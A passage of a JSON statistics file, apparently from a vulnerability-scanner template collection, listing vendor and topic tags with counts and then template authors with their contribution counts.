searchblox","count":1},{"name":"odude","count":1},{"name":"sma1000","count":1},{"name":"cscart","count":1},{"name":"climatejusticerocks-mastodon-instance","count":1},{"name":"alltube_project","count":1},{"name":"advancedpopupcreator","count":1},{"name":"openstreetmap","count":1},{"name":"dotcards","count":1},{"name":"protocol","count":1},{"name":"moinmoin","count":1},{"name":"kindsoft","count":1},{"name":"autoset","count":1},{"name":"filetransfer","count":1},{"name":"kraken","count":1},{"name":"diclosure","count":1},{"name":"target","count":1},{"name":"essential-blocks","count":1},{"name":"bazarr","count":1},{"name":"fortra","count":1},{"name":"pikabu","count":1},{"name":"vsco","count":1},{"name":"lotuscms","count":1},{"name":"mapproxy","count":1},{"name":"software.realtyna","count":1},{"name":"elvish","count":1},{"name":"never5","count":1},{"name":"void","count":1},{"name":"visionhub","count":1},{"name":"lomnido","count":1},{"name":"easyen","count":1},{"name":"page-builder-add","count":1},{"name":"phonepe","count":1},{"name":"nport","count":1},{"name":"webadm","count":1},{"name":"phpdebug","count":1},{"name":"1password","count":1},{"name":"razor","count":1},{"name":"updraftplus","count":1},{"name":"avast","count":1},{"name":"f3","count":1},{"name":"tagged","count":1},{"name":"dixell","count":1},{"name":"szmerinfo","count":1},{"name":"meduza-stealer","count":1},{"name":"americanthinker","count":1},{"name":"heat-trackr_project","count":1},{"name":"refsheet","count":1},{"name":"bscw","count":1},{"name":"loxone","count":1},{"name":"playstation-network","count":1},{"name":"publickey","count":1},{"name":"screenshotapi","count":1},{"name":"amazon-web-services","count":1},{"name":"frigate","count":1},{"name":"mitric","count":1},{"name":"selfcheck","count":1},{"name":"vmstio-mastodon-instance","count":1},{"name":"sponip","count":1},{"name":"clearcom","count":1},{"name":"nconf","count":1},{"name":"digital-ocean","count":1},{"name":"glodon","count":1},{"name":"lftp","count":1},{"name":"checklist","count":1},{"name":"triconsole","count":1},{"name":"tensorflow","count":1},{"name":"pdflayer","count":1},{"name":"siteeditor","count":1},{"name":"anaqua","count":1},{"name":"labtech_software","count":1},{"name":"clickdesk","count":1},{"name":"improvmx","count":1},{"name":"homer","count":1},{"name":"supportivekoala","count":1},{"name":"voice123","count":1},{"name":"bitquery","count":1},{"name":"miniwork","count":1},{"name":"g5theme","count":1},{"name":"management","count":1},{"name":"weglot","count":1},{"name":"mx","count":1},{"name":"solari","count":1},{"name":"onyphe","count":1},{"name":"taiga","count":1},{"name":"simpel-reserveren_project","count":1},{"name":"esmtp","count":1},{"name":"jobmonster","count":1},{"name":"docebo","count":1},{"name":"hgignore","count":1},{"name":"domino","count":1},{"name":"eleanor-cms","count":1},{"name":"chinaunicom","count":1},{"name":"addon","count":1},{"name":"myfitnesspal-community","count":1},{"name":"bullwark","count":1},{"name":"thinkupthemes","count":1},{"name":"advanced_comment_system_project","count":1},{"name":"jivesoftware","count":1},{"name":"slocum","count":1},{"name":"appian","count":1},{"name":"mistrzowie","count":1},{"name":"bitrat","count":1},{"name":"deimos","count":1},{"name":"webcontrol","count":1},{"name":"majordomo","count":1},{"name":"misconfiguration","count":1},{"name":"wikidot","count":1},{"name":"mail-masta_project","count":1},{"name":"wix","count":1},{"name":"directum","count":1},{"name":"shellinabox_project","count":1},{"name":"3600","count":1},{"name":"paramountplus","count":1},{"name":"netris","count":1},{"name":"whatsapp","count":1},{"name":"teslamate","count":1},{"name":"corejoomla","count":1},{"name":"biometrics","count":1},{"name":"ibax","count":1},{"name":"squadcast","count":1},{"name":"objectinjection","count":1},{"name":"curcy","count":1},{"name":"geolocation","count":1},{"name":"dbt","count":1},{"name":"nagvis","count":1},{"name":"prototype","count":1},{"name":"hytec","count":1},{"name":"centreon","count":1},{"name":"kiteworks","count":1},{"name":"x-ray","count":1},{"name":"smi","count":1},{"name":"mi","count":1},{"name":"tink","count":1},{"name":"engadget","count":1},{"name":"webigniter","count":1},{"name":"spx","count":1},{"name":"hydra_project","count":1},{"name":"frangoteam","count":1},{"name":"booking","count":1},{"name":"warriorforum","count":1},{"name":"nytimes","count":1},{"name":"iws-geo-form-fields","count":1},{"name":"bws-linkedin","count":1},{"name":"cracked-io","count":1},{"name":"codebuild","count":1},{"name":"geddy","count":1},{"name":"pondol-formmail_project","count":1},{"name":"smartblog","count":1},{"name":"speakout\\!_email_petitions_project","count":1},{"name":"lms","count":1},{"name":"radius","count":1},{"name":"nirweb-support","count":1},{"name":"duolingo","count":1},{"name":"keepass","count":1},{"name":"bws-adpush","count":1},{"name":"richfaces","count":1},{"name":"kirona","count":1},{"name":"three","count":1},{"name":"senayan","count":1},{"name":"browserless","count":1},{"name":"tidio-gallery_project","count":1},{"name":"smartertrack","count":1},{"name":"jaspersoft","count":1},{"name":"wiren","count":1},{"name":"jumpcloud","count":1},{"name":"wp-video-gallery-free","count":1},{"name":"mailmap","count":1},{"name":"lobsters","count":1},{"name":"vklworld-mastodon-instance","count":1},{"name":"cors","count":1},{"name":"mypixs_project","count":1},{"name":"xmlchart","count":1},{"name":"sterling","count":1},{"name":"maximo","count":1},{"name":"kubeflow","count":1},{"name":"pixelfedsocial","count":1},{"name":"exchangerateapi","count":1},{"name":"playable","count":1},{"name":"url-analyse","count":1},{"name":"geth","count":1},{"name":"parler-archived-profile","count":1},{"name":"patton","count":1},{"name":"cleanweb","count":1},{"name":"webcalendar","count":1},{"name":"tabletoptournament","count":1},{"name":"eporner","count":1},{"name":"exolis","count":1},{"name":"dhtmlx","count":1},{"name":"johnsoncontrols","count":1},{"name":"pricing-deals-for-woocommerce","count":1},{"name":"flowmon","count":1},{"name":"hackerearth","count":1},{"name":"cachet","count":1},{"name":"saml","count":1},{"name":"pcpartpicker","count":1},{"name":"maga-chat","count":1},{"name":"accuweather","count":1},{"name":"caton","count":1},{"name":"commvault","count":1},{"name":"querysol","count":1},{"name":"liftoffsoftware","count":1},{"name":"register","count":1},{"name":"box-storage","count":1},{"name":"etherscan","count":1},{"name":"tecnick","count":1},{"name":"stats","count":1},{"name":"joomlashowroom","count":1},{"name":"ixsystems","count":1},{"name":"simplesamlphp","count":1},{"name":"mobileviewpoint","count":1},{"name":"acs","count":1},{"name":"control","count":1},{"name":"johnniejodelljr","count":1},{"name":"wp-fundraising-donation","count":1},{"name":"phpwind","count":1},{"name":"onelogin","count":1},{"name":"sofneta","count":1},{"name":"flyte","count":1},{"name":"forms","count":1},{"name":"art","count":1},{"name":"zenrows","count":1},{"name":"extremenetworks","count":1},{"name":"codemenschen","count":1},{"name":"solikick","count":1},{"name":"trip","count":1},{"name":"shibboleth","count":1},{"name":"slackholes","count":1},{"name":"rlwrap","count":1},{"name":"easyreport","count":1},{"name":"wp-helper-lite","count":1},{"name":"auru","count":1},{"name":"sco","count":1},{"name":"ericssonlg","count":1},{"name":"vertex","count":1},{"name":"sceditor","count":1},{"name":"xuxueli","count":1},{"name":"vimeo","count":1},{"name":"pagerduty","count":1},{"name":"ransomware","count":1},{"name":"front","count":1},{"name":"totemo","count":1},{"name":"tarantella","count":1},{"name":"safebrowsing","count":1},{"name":"c4","count":1},{"name":"scalar","count":1},{"name":"guard","count":1},{"name":"booth","count":1},{"name":"forumprawneorg","count":1},{"name":"celebrus","count":1},{"name":"fe","count":1},{"name":"nawk","count":1},{"name":"seo","count":1},{"name":"bold-themes","count":1},{"name":"secui","count":1},{"name":"cognito","count":1},{"name":"netmask","count":1},{"name":"imgsrcru","count":1},{"name":"malwarebazaar","count":1},{"name":"supervisord","count":1},{"name":"apim","count":1},{"name":"franklinfueling","count":1},{"name":"uid","count":1},{"name":"shortcode","count":1},{"name":"distcc","count":1},{"name":"contact-form-multi","count":1},{"name":"automatedlogic","count":1},{"name":"apiman","count":1},{"name":"magnusbilling","count":1},{"name":"teltonika","count":1},{"name":"newgrounds","count":1},{"name":"biqsdrive","count":1},{"name":"optimizingmatters","count":1},{"name":"normhost","count":1},{"name":"openmage","count":1},{"name":"geocode","count":1},{"name":"wp-attachment-export","count":1},{"name":"wpsolr","count":1},{"name":"permalink_manager_lite_project","count":1},{"name":"silenttrinity","count":1},{"name":"sabnzbd","count":1},{"name":"stdbuf","count":1},{"name":"cameo","count":1},{"name":"instagram-php-api_project","count":1},{"name":"clickjacking","count":1},{"name":"rainbow_portal","count":1},{"name":"3ware","count":1},{"name":"inertialfate","count":1},{"name":"ics","count":1},{"name":"codeberg","count":1},{"name":"mastonyc-mastodon-instance","count":1},{"name":"enumeration","count":1},{"name":"dolphin","count":1},{"name":"radykal","count":1},{"name":"contempothemes","count":1},{"name":"aspera","count":1},{"name":"fxwebdesign","count":1},{"name":"redux","count":1},{"name":"oahms","count":1},{"name":"ollama","count":1},{"name":"tribalsystems","count":1},{"name":"karel","count":1},{"name":"nosql","count":1},{"name":"toyhouse","count":1},{"name":"iceflow","count":1},{"name":"hivequeue","count":1},{"name":"thetattooforum","count":1},{"name":"uefconnect","count":1},{"name":"ejs","count":1},{"name":"davidlingren","count":1},{"name":"bittube","count":1},{"name":"zmarsacom","count":1},{"name":"hanming","count":1},{"name":"openhab","count":1},{"name":"teamtreehouse","count":1},{"name":"anydesk","count":1},{"name":"duckdev","count":1},{"name":"crm","count":1},{"name":"thinkserver","count":1},{"name":"miniorange","count":1},{"name":"ptr","count":1},{"name":"rubedo","count":1},{"name":"king-theme","count":1},{"name":"pdi","count":1},{"name":"crunchrat","count":1},{"name":"1forge","count":1},{"name":"everything","count":1},{"name":"temporal","count":1},{"name":"colourlovers","count":1},{"name":"friendweb","count":1},{"name":"sandhillsdev","count":1},{"name":"html2wp","count":1},{"name":"phpunit_project","count":1},{"name":"vsphere","count":1},{"name":"fuddorum","count":1},{"name":"springblade","count":1},{"name":"apasionados","count":1},{"name":"graphiql","count":1},{"name":"jbzd","count":1},{"name":"prestahome","count":1},{"name":"rackup","count":1},{"name":"xlight","count":1},{"name":"buymeacoffee","count":1},{"name":"zblog","count":1},{"name":"vnc","count":1},{"name":"lightdash","count":1},{"name":"hookbot","count":1},{"name":"openvas","count":1},{"name":"suse","count":1},{"name":"contus-video-gallery","count":1},{"name":"rsyncd","count":1},{"name":"kanich","count":1},{"name":"fontsy_project","count":1},{"name":"sharepoint_server","count":1},{"name":"wsftp","count":1},{"name":"litmindclub-mastodon-instance","count":1},{"name":"sprintful","count":1},{"name":"lucy","count":1},{"name":"maccmsv10","count":1},{"name":"instatus","count":1},{"name":"authhttp","count":1},{"name":"gloriatv","count":1},{"name":"konga_project","count":1},{"name":"goodlayers","count":1},{"name":"opinio","count":1},{"name":"codis","count":1},{"name":"runcloud","count":1},{"name":"np","count":1},{"name":"fox","count":1},{"name":"hestia","count":1},{"name":"zeta-producer","count":1},{"name":"communilink","count":1},{"name":"ap-pricing-tables-lite","count":1},{"name":"open-redirect","count":1},{"name":"nerdgraph","count":1},{"name":"identityserver","count":1},{"name":"olivetti","count":1},{"name":"rcos","count":1},{"name":"squirrelly","count":1},{"name":"nocodb","count":1},{"name":"statistics","count":1},{"name":"soccitizen4eu","count":1},{"name":"niagara","count":1},{"name":"ko-fi","count":1},{"name":"ispyconnect","count":1},{"name":"codemiq","count":1},{"name":"fatcatapps","count":1},{"name":"efak","count":1},{"name":"sphinx","count":1},{"name":"trassir","count":1},{"name":"ajax-random-post_project","count":1},{"name":"default-jwt","count":1},{"name":"feifeicms","count":1},{"name":"arcade","count":1},{"name":"minecraft","count":1},{"name":"serialize","count":1},{"name":"compliance","count":1},{"name":"spidercontrol","count":1},{"name":"flowdash","count":1},{"name":"business","count":1},{"name":"on-prem","count":1},{"name":"jnews","count":1},{"name":"oembed","count":1},{"name":"nearby","count":1},{"name":"v2x","count":1},{"name":"uber","count":1},{"name":"gamespot","count":1},{"name":"mongoose","count":1},{"name":"elbtide","count":1},{"name":"caldera","count":1},{"name":"noescape","count":1},{"name":"orangescrum","count":1},{"name":"home-assistant","count":1},{"name":"eibiz","count":1},{"name":"binance","count":1},{"name":"formalms","count":1},{"name":"bdsmlr","count":1},{"name":"topacm","count":1},{"name":"zenserp","count":1},{"name":"joomlatag","count":1},{"name":"unleashed","count":1},{"name":"musiciansocial-mastodon-instance","count":1},{"name":"sslmate","count":1},{"name":"lispeltuut","count":1},{"name":"gateone","count":1},{"name":"wannacry","count":1},{"name":"albicla","count":1},{"name":"internet-archive-account","count":1},{"name":"pony","count":1},{"name":"planon","count":1},{"name":"clockify","count":1},{"name":"gn-publisher","count":1},{"name":"grupposcai","count":1},{"name":"groupib","count":1},{"name":"itchio","count":1},{"name":"sila","count":1},{"name":"slant","count":1},{"name":"netmaker","count":1},{"name":"polycom","count":1},{"name":"tika","count":1},{"name":"eos","count":1},{"name":"overseerr","count":1},{"name":"storycorps","count":1},{"name":"podcast_channels_project","count":1},{"name":"chopslider","count":1},{"name":"sensei-lms","count":1},{"name":"magix","count":1},{"name":"xray","count":1},{"name":"mailoney","count":1},{"name":"femtocell","count":1},{"name":"theguardian","count":1},{"name":"tracking","count":1},{"name":"formcraft3","count":1},{"name":"adWidget","count":1},{"name":"imm","count":1},{"name":"couch","count":1},{"name":"optiLink","count":1},{"name":"webftp","count":1},{"name":"creatio","count":1},{"name":"platzi","count":1},{"name":"uwumarket","count":1},{"name":"yunanbao","count":1},{"name":"smelsy","count":1},{"name":"anti-plagiarism_project","count":1},{"name":"boot","count":1},{"name":"wakatime","count":1},{"name":"brightsign","count":1},{"name":"3dnews","count":1},{"name":"cerebro","count":1},{"name":"kaes","count":1},{"name":"hamaha","count":1},{"name":"smart-office","count":1},{"name":"osghs","count":1},{"name":"logitech","count":1},{"name":"celery","count":1},{"name":"dss","count":1},{"name":"siteomat","count":1},{"name":"exposed","count":1},{"name":"pfblockerng","count":1},{"name":"aicloud","count":1},{"name":"furaffinity","count":1},{"name":"cvms","count":1},{"name":"teddygirls","count":1},{"name":"land-software","count":1},{"name":"symmetricom","count":1},{"name":"uiuxdevsocial-mastodon-instance","count":1},{"name":"easyimage","count":1},{"name":"avg","count":1},{"name":"kakao","count":1},{"name":"aliexpress","count":1},{"name":"bws-pdf-print","count":1},{"name":"ajaxreg","count":1},{"name":"udraw","count":1},{"name":"dvdFab","count":1},{"name":"gradio","count":1},{"name":"smtp2go","count":1},{"name":"bitcoinaverage","count":1},{"name":"hirak","count":1},{"name":"casemanager","count":1},{"name":"xargs","count":1},{"name":"hcm","count":1},{"name":"websvn","count":1},{"name":"mastodon-101010pl","count":1},{"name":"ti-woocommerce-wishlist","count":1},{"name":"woo-bulk-price-update","count":1},{"name":"edgeos","count":1},{"name":"friendfinder","count":1},{"name":"ubisoft","count":1},{"name":"federatedpress-mastodon-instance","count":1},{"name":"logontracer","count":1},{"name":"moleculer","count":1},{"name":"voicescom","count":1},{"name":"accessmanager","count":1},{"name":"promtail","count":1},{"name":"servmask","count":1},{"name":"coda","count":1},{"name":"cnet","count":1},{"name":"tryhackme","count":1},{"name":"talroo","count":1},{"name":"ocomon_project","count":1},{"name":"readtomyshoe","count":1},{"name":"utipio","count":1},{"name":"web3storage","count":1},{"name":"timeout","count":1},{"name":"affiliatefeeds","count":1},{"name":"onkyo","count":1},{"name":"intellifuel","count":1},{"name":"phoenixframework","count":1},{"name":"wondercms","count":1},{"name":"csrfguard","count":1},{"name":"teclib-edition","count":1},{"name":"oceanwp","count":1},{"name":"yeswehack","count":1},{"name":"ebird","count":1},{"name":"isg","count":1},{"name":"sqwebmail","count":1},{"name":"bower","count":1},{"name":"tianqing","count":1},{"name":"gryphonconnect","count":1},{"name":"webtools","count":1},{"name":"linshare","count":1},{"name":"smartzone","count":1},{"name":"armemberplugin","count":1},{"name":"my-instants","count":1},{"name":"cars-seller-auto-classifieds-script_project","count":1},{"name":"chillcreations","count":1},{"name":"tcsh","count":1},{"name":"keystonejs","count":1},{"name":"dapp","count":1},{"name":"revoked","count":1},{"name":"opensso","count":1},{"name":"trendmicro","count":1},{"name":"icegram","count":1},{"name":"chronoengine","count":1},{"name":"llm","count":1},{"name":"visualstudio","count":1},{"name":"bws-social-buttons","count":1},{"name":"cdg","count":1},{"name":"bws-twitter","count":1},{"name":"pokerstrategy","count":1},{"name":"datingru","count":1},{"name":"picsart","count":1},{"name":"spx-php","count":1},{"name":"ziahamza","count":1},{"name":"wattpad","count":1},{"name":"announcekit","count":1},{"name":"robot-cpa","count":1},{"name":"vlc-media","count":1},{"name":"kuma","count":1},{"name":"joinmastodon","count":1},{"name":"hackenproof","count":1},{"name":"db2","count":1},{"name":"reflected","count":1},{"name":"joomlaworks","count":1},{"name":"helmet_store_showroom_project","count":1},{"name":"treeview","count":1},{"name":"mastodonbooksnet-mastodon-instance","count":1},{"name":"geddyjs","count":1},{"name":"tripadvisor","count":1},{"name":"grapher","count":1},{"name":"powercommanager","count":1},{"name":"disneyplus","count":1},{"name":"currencyscoop","count":1},{"name":"maxsite","count":1},{"name":"looker","count":1},{"name":"acemanager","count":1},{"name":"piekielni","count":1},{"name":"slsh","count":1},{"name":"marshmallow","count":1},{"name":"sahipro","count":1},{"name":"firefox","count":1},{"name":"nairaland","count":1},{"name":"todoist","count":1},{"name":"tpshop","count":1},{"name":"panda_pods_repeater_field_project","count":1},{"name":"achecker","count":1},{"name":"geniusocean","count":1},{"name":"smarterstats","count":1},{"name":"wget","count":1},{"name":"mailboxvalidator","count":1},{"name":"reality","count":1},{"name":"redbubble","count":1},{"name":"altn","count":1},{"name":"oglaszamy24hpl","count":1},{"name":"blackduck","count":1},{"name":"readtomyshoe_project","count":1},{"name":"qualcomm","count":1},{"name":"minds","count":1},{"name":"groomify","count":1},{"name":"fielupload","count":1},{"name":"ltrace","count":1},{"name":"dgtl","count":1},{"name":"acexy","count":1},{"name":"rake","count":1},{"name":"gurock","count":1},{"name":"soup","count":1},{"name":"ellucian","count":1},{"name":"blocktestimonial","count":1},{"name":"codesnippets","count":1},{"name":"cve02024","count":1},{"name":"maestro","count":1},{"name":"yazawaj","count":1},{"name":"brandfolder","count":1},{"name":"wpruby","count":1},{"name":"h2database","count":1},{"name":"tootingch-mastodon-instance","count":1},{"name":"steemit","count":1},{"name":"buildkite","count":1},{"name":"acketstorm","count":1},{"name":"tufin","count":1},{"name":"camptocamp","count":1},{"name":"member-hero","count":1},{"name":"airnotifier","count":1},{"name":"microsoft-teams","count":1},{"name":"ifunny","count":1},{"name":"steller","count":1},{"name":"struts2","count":1},{"name":"watchmemorecom","count":1},{"name":"trueranker","count":1},{"name":"fusion","count":1},{"name":"openweather","count":1},{"name":"crowdin","count":1},{"name":"cherokee","count":1},{"name":"battlenet","count":1},{"name":"abbott","count":1},{"name":"securityonionsolutions","count":1},{"name":"flatpm","count":1},{"name":"attributewizardpro","count":1},{"name":"getresponse","count":1},{"name":"sqlbuddy","count":1},{"name":"pcdn","count":1},{"name":"instructables","count":1},{"name":"uncanny-learndash-toolkit","count":1},{"name":"mastodon-rigczclub","count":1},{"name":"chaos","count":1},{"name":"pendinginstallvzw","count":1},{"name":"xing","count":1},{"name":"wireless","count":1},{"name":"dplus","count":1},{"name":"booking-calendar","count":1},{"name":"access-control","count":1},{"name":"cookex","count":1},{"name":"asmx","count":1},{"name":"miconfig","count":1},{"name":"je_form_creator","count":1},{"name":"rantli","count":1},{"name":"faust","count":1},{"name":"next-terminal","count":1},{"name":"imprivata","count":1},{"name":"jhipster","count":1},{"name":"pauple","count":1},{"name":"marmoset","count":1},{"name":"finance","count":1},{"name":"tengine","count":1},{"name":"cgit","count":1},{"name":"eng","count":1},{"name":"synametrics","count":1},{"name":"insanejournal","count":1},{"name":"jspxcms","count":1},{"name":"yachtcontrol","count":1},{"name":"untappd","count":1},{"name":"zentral","count":1},{"name":"skyscanner","count":1},{"name":"domphp","count":1},{"name":"reprise","count":1},{"name":"nessus","count":1},{"name":"yui2","count":1},{"name":"vision","count":1},{"name":"gelembjuk","count":1},{"name":"thecatapi","count":1},{"name":"bumsys","count":1},{"name":"keenetic","count":1},{"name":"sphinxonline","count":1},{"name":"locust","count":1},{"name":"cx","count":1},{"name":"polygon","count":1},{"name":"monitorix","count":1},{"name":"ilovegrowingmarijuana","count":1},{"name":"cyberoamworks","count":1},{"name":"dozzle","count":1},{"name":"gianni_tommasi","count":1},{"name":"admin-font-editor_project","count":1},{"name":"fastvue","count":1},{"name":"airee","count":1},{"name":"jsmol2wp","count":1},{"name":"spring-boot-actuator-logview_project","count":1},{"name":"akniga","count":1},{"name":"memrise","count":1},{"name":"codebase","count":1},{"name":"kiboit","count":1},{"name":"panda","count":1},{"name":"shortpixel-adaptive-images","count":1},{"name":"owly","count":1},{"name":"addpac","count":1},{"name":"registrations-for-the-events-calendar","count":1},{"name":"stopbadbots","count":1},{"name":"n-media-woocommerce-checkout-fields","count":1},{"name":"oneidentity","count":1},{"name":"timely","count":1},{"name":"imgbb","count":1},{"name":"uvdesk","count":1},{"name":"Microsoft","count":1},{"name":"sunhillo","count":1},{"name":"shoretel","count":1},{"name":"kopano","count":1},{"name":"activecollab","count":1},{"name":"darkcomet","count":1},{"name":"librenms","count":1},{"name":"podlove","count":1},{"name":"webport","count":1},{"name":"erp-nc","count":1},{"name":"lanproxy","count":1},{"name":"hoteldrui","count":1},{"name":"internet-archive-user-search","count":1},{"name":"fish","count":1},{"name":"deeplink","count":1},{"name":"taxonomies-change-checkbox-to-radio-buttons","count":1},{"name":"bludit","count":1},{"name":"sporcle","count":1},{"name":"weheartit","count":1},{"name":"vibilagare","count":1},{"name":"zenml","count":1},{"name":"the-plus-addons-for-elementor","count":1},{"name":"polarisft","count":1},{"name":"tos","count":1},{"name":"mpftvc","count":1},{"name":"hometechsocial-mastodon-instance","count":1},{"name":"dasan","count":1},{"name":"quixplorer","count":1},{"name":"kingdee","count":1},{"name":"dsr250","count":1},{"name":"greentreelabs","count":1},{"name":"kotburger","count":1},{"name":"appjetty","count":1},{"name":"ifeelweb","count":1},{"name":"mura","count":1},{"name":"grandprof","count":1},{"name":"artists-clients","count":1},{"name":"dolphinscheduler","count":1},{"name":"simply-schedule-appointments","count":1},{"name":"codekop","count":1},{"name":"disqus","count":1},{"name":"zookeeper","count":1},{"name":"myvuehelp","count":1},{"name":"distance","count":1},{"name":"johnmccollum","count":1},{"name":"goahead","count":1},{"name":"login-with-phonenumber","count":1},{"name":"vsftpd","count":1},{"name":"limit","count":1},{"name":"gmail","count":1},{"name":"jmarket","count":1},{"name":"macaddresslookup","count":1},{"name":"bouqueteditor_project","count":1},{"name":"shirnecms","count":1},{"name":"openautomationsoftware","count":1},{"name":"lvm","count":1},{"name":"evernote","count":1},{"name":"gofile","count":1},{"name":"secure-donation","count":1},{"name":"stageshow_project","count":1},{"name":"joomlanook","count":1},{"name":"caldotcom","count":1},{"name":"mastodon-mastodon","count":1},{"name":"wimkin-publicprofile","count":1},{"name":"sunflower","count":1},{"name":"micro","count":1},{"name":"bookstack","count":1},{"name":"b2evolution","count":1},{"name":"harmony","count":1},{"name":"bonga-cams","count":1},{"name":"imgur","count":1},{"name":"grandnode","count":1},{"name":"oturia","count":1},{"name":"osclass","count":1},{"name":"twitcasting","count":1},{"name":"msmq","count":1},{"name":"hubpages","count":1},{"name":"revmakx","count":1},{"name":"pippoint","count":1},{"name":"omniampx","count":1},{"name":"panasonic","count":1},{"name":"mastodonchasedemdev-mastodon-instance","count":1},{"name":"phpminiadmin","count":1},{"name":"theme-fusion","count":1},{"name":"averta","count":1},{"name":"next","count":1},{"name":"xibocms","count":1},{"name":"maianscriptworld","count":1},{"name":"open-school","count":1},{"name":"awk","count":1},{"name":"strava","count":1},{"name":"aspnet","count":1},{"name":"hanta","count":1},{"name":"biolink","count":1},{"name":"dionesoft","count":1},{"name":"pronounspage","count":1},{"name":"vitogate","count":1},{"name":"whmcs","count":1},{"name":"chimpgroup","count":1},{"name":"trilithic","count":1},{"name":"cloudfront","count":1},{"name":"planonsoftware","count":1},{"name":"speakout-email-petitions","count":1},{"name":"tieline","count":1},{"name":"footprints","count":1},{"name":"phppgadmin_project","count":1},{"name":"xvideos-models","count":1}],"authors":[{"name":"dhiyaneshdk","count":1277},{"name":"daffainfo","count":864},{"name":"dwisiswant0","count":803},{"name":"pikpikcu","count":353},{"name":"pussycat0x","count":353},{"name":"ritikchaddha","count":336},{"name":"pdteam","count":297},{"name":"princechaddha","count":268},{"name":"ricardomaia","count":232},{"name":"geeknik","count":230},{"name":"theamanrawat","count":223},{"name":"r3y3r53","count":200},{"name":"0x_akoko","count":179},{"name":"gy741","count":158},{"name":"rxerium","count":141},{"name":"sleepingbag945","count":132},{"name":"righettod","count":131},{"name":"arafatansari","count":118},{"name":"tess","count":109},{"name":"pdresearch","count":81},{"name":"iamnoooob","count":68},{"name":"idealphase","count":65},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"rootxharsh","count":61},{"name":"akincibor","count":59},{"name":"for3stco1d","count":55},{"name":"philippedelteil","count":53},{"name":"gaurang","count":42},{"name":"edoardottt","count":42},{"name":"johnk3r","count":40},{"name":"j4vaovo","count":35},{"name":"c-sh0","count":35},{"name":"luisfelipe146","count":31},{"name":"adam crosser","count":31},{"name":"ice3man","count":29},{"name":"mastercho","count":29},{"name":"pwnhxl","count":28},{"name":"hardik-solanki","count":24},{"name":"organiccrap","count":24},{"name":"techbrunchfr","count":23},{"name":"ctflearner","count":23},{"name":"harsh","count":23},{"name":"ffffffff0x","count":22},{"name":"parthmalhotra","count":20},{"name":"sullo","count":18},{"name":"cckuailong","count":18},{"name":"random-robbie","count":16},{"name":"lu4nx","count":16},{"name":"0xpugazh","count":16},{"name":"shaikhyaser","count":16},{"name":"bhutch","count":15},{"name":"sheikhrishad","count":15},{"name":"unapibageek","count":15},{"name":"pr3r00t","count":15},{"name":"tenbird","count":14},{"name":"r3dg33k","count":14},{"name":"kazgangap","count":14},{"name":"milo2012","count":14},{"name":"dogasantos","count":14},{"name":"elsfa7110","count":13},{"name":"sharath","count":13},{"name":"nullfuzz","count":13},{"name":"0ri2n","count":13},{"name":"melbadry9","count":13},{"name":"theabhinavgaur","count":13},{"name":"suman_kar","count":12},{"name":"kazet","count":12},{"name":"meme-lord","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"random_robbie","count":10},{"name":"alph4byt3","count":10},{"name":"logicalhunter","count":10},{"name":"hackergautam","count":10},{"name":"0x240x23elu","count":10},{"name":"co5mos","count":10},{"name":"nadino","count":10},{"name":"emadshanab","count":9},{"name":"adamcrosser","count":9},{"name":"olearycrew","count":9},{"name":"momika233","count":9},{"name":"fabaff","count":9},{"name":"oppsec","count":9},{"name":"initstring","count":9},{"name":"veshraj","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"irshad ahamed","count":8},{"name":"_0xf4n9x_","count":8},{"name":"noraj","count":8},{"name":"iamthefrogy","count":8},{"name":"zh","count":8},{"name":"divya_mudgal","count":7},{"name":"huta0","count":7},{"name":"its0x08","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"nodauf","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"techryptic (@tech)","count":7},{"name":"leovalcante","count":7},{"name":"amit-jd","count":7},{"name":"tarunkoyalwar","count":7},{"name":"randomstr1ng","count":7},{"name":"caspergn","count":7},{"name":"dr_set","count":7},{"name":"byt3bl33d3r","count":6},{"name":"forgedhallpass","count":6},{"name":"hahwul","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"imnightmaree","count":6},{"name":"evan rubinstein","count":6},{"name":"puzzlepeaches","count":6},{"name":"ja1sh","count":6},{"name":"gitlab red team","count":6},{"name":"pathtaga","count":6},{"name":"pentest_swissky","count":6},{"name":"__fazal","count":6},{"name":"devang-solanki","count":6},{"name":"justaacat","count":6},{"name":"clem9669","count":6},{"name":"xelkomy","count":6},{"name":"megamansec","count":6},{"name":"your3cho","count":5},{"name":"prajiteshsingh","count":5},{"name":"s0obi","count":5},{"name":"r12w4n","count":5},{"name":"shine","count":5},{"name":"powerexploit","count":5},{"name":"kh4sh3i","count":5},{"name":"joanbono","count":5},{"name":"r3naissance","count":5},{"name":"robotshell","count":5},{"name":"vicrack","count":5},{"name":"arm!tage","count":5},{"name":"mr-xn","count":5},{"name":"gtrrnr","count":5},{"name":"defr0ggy","count":5},{"name":"panch0r3d","count":5},{"name":"andreluna","count":5},{"name":"lucky0x0d","count":5},{"name":"podalirius","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"tanq16","count":4},{"name":"incogbyte","count":4},{"name":"m4lwhere","count":4},{"name":"scent2d","count":4},{"name":"cookiehanhoan","count":4},{"name":"nybble04","count":4},{"name":"dolev farhi","count":4},{"name":"pulsesecurity.co.nz","count":4},{"name":"ice3man543","count":4},{"name":"3th1c_yuk1","count":4},{"name":"dadevel","count":4},{"name":"0xr2r","count":4},{"name":"king-alexander","count":4},{"name":"jpg0mez","count":4},{"name":"xxcdd","count":4},{"name":"e_schultze_","count":4},{"name":"lum8rjack","count":4},{"name":"wisnupramoedya","count":4},{"name":"ggranjus","count":4},{"name":"h1ei1","count":4},{"name":"k0pak4","count":4},{"name":"heeress","count":4},{"name":"shankar acharya","count":4},{"name":"iamnooob","count":4},{"name":"imjust0","count":3},{"name":"ph33r","count":3},{"name":"andydoering","count":3},{"name":"yash anand 